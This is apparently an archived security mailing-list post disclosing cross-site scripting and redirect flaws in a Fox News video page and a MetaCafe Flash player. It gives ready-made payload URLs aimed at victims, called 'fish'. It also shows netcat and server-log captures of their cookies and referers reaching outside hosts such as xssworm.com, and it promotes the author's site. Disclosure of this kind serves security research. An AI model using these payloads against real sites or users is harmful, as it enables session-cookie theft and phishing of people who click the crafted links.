foxnews-xss.txt

`Foxnews 0day XSS Shock Attack  
<http://www.foxnews.com/video2/launchPage.html?100207/100207_imag_PETITE&%253Ch1%253E%253Ca%2520href=//xssworm.com%253EXSS%2520Worm%2520Web%25202.0%2520Security%2520Portal%253C/a%253E%253Cbr%253E%253C/h1%253EWith%2520new%25200day%2520Fox%2520News%2520XSS%2520Hacking%2520Video!>  
Demo link to send to a fish:  
  
http://www.foxnews.com/video2/launchPage.html?http://localhost/  
  
With netcat listen on localhost :  
  
listening on [any] 80 ...  
connect to localhost [127.0.0.1] from localhost [127.0.0.1] 1964  
GET  
/E05510/a3/0/3/1380/1/0/116282DDC64/0/0/00000000/312340660.gif?D=DM%5FLOC%3D  
http%3A%2F%2Fwww%252Efoxnews%252Ecom%2Fvideo2%2FlaunchPage%252Ehtml%253Fhttp%3A%  
2F%2Flocalhost%2526pageType%253Dmisc%2526miscPage%253DVideo%252520Launch%252520P  
age%26DM%5FREF%3D%26DM%5FTIT%3DFOXNews%252Ecom%20%2D%20Video%20Launch%20Page%20%  
2D%20FOXNews%252Ecom%26DM%5FEOM%3D1 HTTP/1.1  
Host: pix01.revsci.net  
User-Agent: Mozilla/5.0 (Mandriver)  
Accept: image/png,*/*;q=0.5  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7  
Keep-Alive: 300  
Connection: keep-alive  
Referer: http://www.foxnews.com/video2/launchPage.html?http://localhost  
*Cookie: NETID01=9mWO-Ar@1RoAAAm1AWEAAAC5;  
NETSEGS_J05532=960C7930BE970CE4&J05532  
&3F149836&472757D9&0&&4723FE85&C2C6A1738F3B885FCA46DE74CFF355ED*  
  
  
I think maybe this is to make many shock waves with XSS !  
Zero Day Shockwave SWF Player Exploit with XSS  
Attack<http://xssworm.blogvis.com/12/xssworm/zero-day-shockwave-swf-player-exploit-with-xss-attack/>  
in the hacking metacafe we discover Shockwave XSS 0day attack to use by  
blackhat to steal fish:  
  
MetaCafe XSS Worm Vulnerabilities - ZeroDay Shockwave Attack POC - :  
  
http://www.metacafe.com/f/fvp/EmbedVideoPlayer_5.1.0.0.swf?itemID=755028&mediaURL=http://xssworm.com/?fish&normalizedTitle=space_trip&isViral=false&isWatermarked=false&postrollContentURL=http://l3images.metacafe.com/f/fvp/EmbedItemSelector_3.0.0.5.swf&networkingAllowed=true  
&  
  
We see this outputs in xssworm.com log - :  
  
  
GET /crossdomain.xml HTTP/1.1  
Host: metacafe.122.2o7.net  
Cookie: s_vi_xxhybx7BxBxxclx7Fx7D=[CS]v4|472A0D2D00060B2-290B2900004DB|472A0  
D2D[CE];  
s_vihfex7Ekx7Dx7Fzxx=[CS]v4|47208A0C00004D74-A170C5400003A87|472DA4DB[  
CE]; s_vi_jdghjlgdijg=[CS]v4|472605E00007606-A170BAE0000639DC|4726056DCE]  
s_vi  
_wzvqcdsx7F7×60qx7isx7Fx7D[CS]v4|.....  
  
snips   
  
We see many more serious vulnerability in the web 2.0 today. As you must be  
sure to visit http://xssworm.com/ security portal to discuss this shock  
problem && many thanks for your reply. I am interested.  
  
*vaj  
  
  
--   
Francesco Vaj [CISSP - GIAC]  
CSS Security Researcher  
mailto:[email protected]  
aim: XSS Cross Site  
------  
XSS Cross Site Scripting Attacks and  
Web 2.0 AJAX Security Information News -  
http://xssworm.com/  
------  
"Vaj, bella vaj."  
`